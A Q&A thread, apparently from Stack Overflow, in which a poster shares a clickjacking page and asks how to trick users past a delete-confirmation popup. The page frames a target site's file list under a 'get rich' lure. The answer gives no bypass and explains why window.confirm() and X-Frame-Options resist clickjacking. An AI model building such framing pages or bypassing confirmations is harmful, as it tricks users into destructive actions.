2

I am testing a web application for click-jacking vulnerability. The attack works fine for single clicks, however i am trying to delete a file and the hidden frame (victim) throws a pop-up confirmation.

Is there any way to hide the popup(same as of frame) and trick the user to accept it. I have googled a lot but no luck :(

Frame busting busters also not working.

Please help, Thanks

I am doing something wrong Click-jacking page code:

<html>
<body>
<script>
window.alert = function() { return false; }
</script>

<script>
window.onbeforeunload = function()
{
    return "Maybe you want to leave the page, before you become rich??";
}
</script>
<style>
iframe { 
  width:100%;
  height:100%;
  position:absolute;
  top:0; left:0;
  filter:alpha(opacity=50); /* in real life opacity=0 */
  opacity:0.5;
}
</style>
<div>Click on the link to get rich now:</div>

<iframe src="https://xyz.com/Forms/AllItems.aspx"></iframe>

<a href="https://www.google.com" target="_blank" style="position:relative;left:20px;z-index:-1">CLICK ME!</a>

<div>You'll be rich for the whole life!</div>
</body>
</html>
AJINKYA
  • 153
  • 1
  • 1
  • 7

1 Answers1

2

Using window.confirm() is a valid method of mitigating Clickjacking when it is not possible to use x-frame-options. This popup window cannot be framed. In every browser except for Internet Explorer the origin of the confirmation window is displayed if the domain differs from the parent iframe in the popup because of Clickjacking. The use of window.confirm() as method of defending against clickjacking has been used by Google.

Using the x-frame-options is still a better method preventing clickjacking, however there are some cases where it cannot be used. For example not every browser supports the whitelist feature, and sometimes sites need a very large whitelist.

rook
  • 47,004
  • 10
  • 94
  • 182